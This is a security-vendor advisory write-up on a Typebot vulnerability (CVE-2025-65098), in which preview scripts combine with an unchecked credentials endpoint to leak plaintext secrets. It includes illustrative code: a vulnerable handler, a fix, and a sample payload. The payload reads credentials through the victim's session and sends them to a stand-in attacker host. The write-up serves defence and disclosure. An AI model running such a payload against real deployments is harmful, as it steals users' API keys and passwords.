Typebot Credential Theft Trick (CVE-2025-65098)
Key Takeaways
- A malicious Typebot can run client-side JavaScript when a victim clicks “Run.”
- An API endpoint can return plaintext credentials without verifying ownership.
- Impact includes theft of OpenAI keys, Google Sheets tokens, and SMTP passwords.
- Exploitation requires user interaction, but not elevated privileges.
- Fixes are available, and upgrading removes the vulnerable behavior.
Typebot’s “Run” Preview Could Leak Your AI Secrets
A high-severity vulnerability in Typebot, an open-source chatbot builder, can allow attackers to steal stored credentials from other users. The attack chain combines client-side script execution during bot preview with an authorization weakness that exposes plaintext secrets via an API endpoint. If a victim previews a malicious typebot and clicks “Run,” the attacker’s script can execute in the victim’s browser and retrieve sensitive credentials, including OpenAI API keys, Google Sheets tokens, and SMTP passwords. (NVD)
What We Know
The issue is tracked as CVE-2025-65098 and GHSA-4xc5-wfwc-jw47, published on January 22, 2026. Typebot’s advisory describes a scenario where a malicious actor creates a typebot containing a Script block configured to “execute on client.” When a victim previews the typebot and clicks “Run,” the embedded JavaScript executes in the victim’s browser within an authenticated session context. (GitHub)
The advisory also describes an API endpoint, /api/trpc/credentials.getCredentials, that returns plaintext credentials but does not verify that the authenticated user owns the requested credential ID. This is an insecure direct object reference (IDOR) condition: an attacker can enumerate or guess IDs and retrieve secrets that belong to other users.
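To make the authorization gap concrete, the sketch below shows the general shape of the flawed pattern. It is not Typebot's actual code: the Express-style framework, the in-memory store, the header-based auth stand-in, and the query parameter and field names are illustrative assumptions; only the endpoint path comes from the advisory.

```ts
// Hypothetical sketch of the reported flaw, NOT Typebot's actual code.
// The framework, store, and auth mechanism are stand-ins; only the
// endpoint path comes from the advisory.
import express from "express";

interface CredentialRecord {
  id: string;
  ownerId: string; // user the secret belongs to
  secret: string;  // stored and returned in plaintext, e.g. an OpenAI key
}

// Stand-in for the credentials table.
const credentialStore = new Map<string, CredentialRecord>([
  ["cred-123", { id: "cred-123", ownerId: "alice", secret: "sk-..." }],
]);

const app = express();

app.get("/api/trpc/credentials.getCredentials", (req, res) => {
  // Authentication IS checked: the caller must present a session.
  const userId = req.header("x-demo-user"); // stand-in for real session auth
  if (!userId) return void res.status(401).end();

  // Ownership is NOT checked: any authenticated user can request any
  // credential ID. This is the IDOR condition the advisory describes.
  const record = credentialStore.get(String(req.query.credentialsId));
  if (!record) return void res.status(404).end();

  // The plaintext secret goes back to whoever asked.
  res.json({ data: record.secret });
});

app.listen(3000);
```

The key point is that the lookup is keyed only by the ID the caller supplies; nothing ties the record back to the caller's identity.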
NVD lists the GitHub CNA assessment as a CVSS 3.1 base score of 7.4 (High), with user interaction required. (NVD)
How the Breach Happened
This is best understood as a vulnerability chain: two weaknesses that together turn a normal product workflow into a credential-theft path.
First, Typebot includes a Script block feature that can execute JavaScript on the client when configured to do so. In practice, this means an attacker can embed code that runs inside the victim’s browser when the victim previews the bot and clicks “Run.” Because the code executes in the context of the victim’s authenticated session, it can make same-origin requests to Typebot APIs as the victim. (GitHub)
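In practical terms, a payload in that position needs nothing beyond the browser's Fetch API. The sketch below is hypothetical: the query-string shape matches the illustrative handler above rather than Typebot's real tRPC wire format, and the credential ID and exfiltration URL are placeholders.

```ts
// Hypothetical payload of the kind a malicious "execute on client"
// Script block could carry. It runs in the victim's browser during
// preview, so fetch() is same-origin and rides the victim's session.
// The query-string shape matches the illustrative handler above, not
// Typebot's real tRPC wire format; the collection URL is a placeholder.
async function stealCredential(credentialsId: string): Promise<void> {
  const res = await fetch(
    `/api/trpc/credentials.getCredentials?credentialsId=${encodeURIComponent(credentialsId)}`,
    { credentials: "include" } // send the victim's session cookies
  );
  if (!res.ok) return;
  const body = await res.json();

  // Exfiltrate to an attacker-controlled endpoint (placeholder URL).
  await fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "content-type": "application/json" },
    body: JSON.stringify(body),
  });
}

// Per the advisory, IDs can be enumerated or guessed; a real payload
// would loop over candidates rather than know one up front.
void stealCredential("cred-123");
```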
Second, the credentials retrieval endpoint returns secrets in plaintext and performs an authentication check, but not an ownership authorization check. As described in the advisory, this allows an attacker-controlled script to fetch credential records that belong to the victim or potentially other users, depending on accessible IDs and scope. The result is direct exfiltration of sensitive secrets like OpenAI API keys, Google Sheets tokens, and SMTP passwords.
This is an AI-adjacent security failure because it targets the operational secrets that power AI workflows, especially LLM API keys, which can enable downstream misuse, fraud, or data exposure once stolen.
Why It Matters
This vulnerability highlights a recurring problem in AI-enabled app ecosystems: the security boundary often collapses around the credentials that connect AI apps to models, data stores, and messaging systems.
If OpenAI keys are stolen, an attacker can potentially run unauthorized workloads, rack up usage costs, or probe connected AI functionality depending on how keys are scoped and monitored. If Google Sheets tokens or SMTP credentials are exposed, the blast radius expands beyond the AI app into business systems that handle customer data, outbound communications, or internal workflows.
The user interaction requirement may reduce opportunistic exploitation, but it aligns with realistic social engineering patterns. An attacker only needs a victim to preview or test a bot. In collaborative environments where bots are shared, copied, or reviewed, that is a credible path. Finally, because the endpoint returns plaintext secrets, the consequence of a single successful exploitation is immediate and difficult to unwind without full credential rotation.
PointGuard AI Perspective
Incidents like CVE-2025-65098 are a reminder that many AI security failures are not only about model behavior. They are also about the surrounding control plane: credentials, tool integrations, and the runtime pathways that connect AI apps to sensitive systems.
PointGuard AI helps teams reduce risk from credential exposure and AI workflow abuse with practical, AI-focused controls:
- Runtime visibility into AI app interactions: When AI applications or agent workflows call external tools, APIs, or model endpoints, monitoring prompt and response flows helps identify suspicious behavior patterns that often accompany credential misuse or data access anomalies. Source: AI Runtime Defense (PointGuard AI)
- AI-native detection for injection-style abuse: While this incident is primarily an XSS and authorization failure, the attacker's goal is similar to prompt and context manipulation: causing systems to reveal secrets through allowed pathways. Understanding and detecting injection-style tactics across AI surfaces is essential as assistants and agents become more integrated with tools. Source: What is Prompt Injection? (PointGuard AI)
- Operational learning from real incidents: Security teams move faster when they can track patterns across AI incidents, including how credentials, connectors, and agent workflows become leverage points for attackers. Source: AI Security Incident Tracker (PointGuard AI)
Forward-looking takeaway: as AI apps become more collaborative and more connected to enterprise systems, preventing secret exposure requires both strong authorization controls and continuous runtime monitoring of AI-driven workflows.
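As a concrete illustration of the authorization half of that takeaway, here is how the illustrative handler from earlier could be corrected: the lookup is scoped to the authenticated caller, so possessing an ID is no longer enough. The names remain the same hypothetical stand-ins.

```ts
// Hypothetical fix, replacing the vulnerable handler in the earlier
// sketch (same stand-in names). The lookup is scoped to the caller,
// so knowing a credential ID is no longer sufficient.
app.get("/api/trpc/credentials.getCredentials", (req, res) => {
  const userId = req.header("x-demo-user");
  if (!userId) return void res.status(401).end();

  const record = credentialStore.get(String(req.query.credentialsId));

  // Ownership check; respond 404 rather than 403 so the endpoint does
  // not confirm that a guessed ID exists.
  if (!record || record.ownerId !== userId) {
    return void res.status(404).end();
  }

  res.json({ data: record.secret });
});
```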
Incident Scorecard Details
Total AISSI Score: 7.6/10
| Dimension | Score | Rationale | AISSI Weighting |
| --- | --- | --- | --- |
| Criticality | 8.0 | Theft of high-value secrets (LLM keys, tokens, SMTP creds) | 25% |
| Propagation | 6.5 | Requires sharing or previewing malicious typebots | 20% |
| Exploitability | 7.0 | Low complexity but requires user interaction | 15% |
| Supply Chain | 6.5 | Affects a popular open-source chatbot builder and related packages | 15% |
| Business Impact | 8.0 | Potential for rapid financial abuse and downstream system compromise via stolen credentials | 25% |
Sources
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65098
- GitHub Security Advisory: https://github.com/advisories/GHSA-4xc5-wfwc-jw47
- PointGuard AI: AI Runtime Defense; What is Prompt Injection?; AI Security Incident Tracker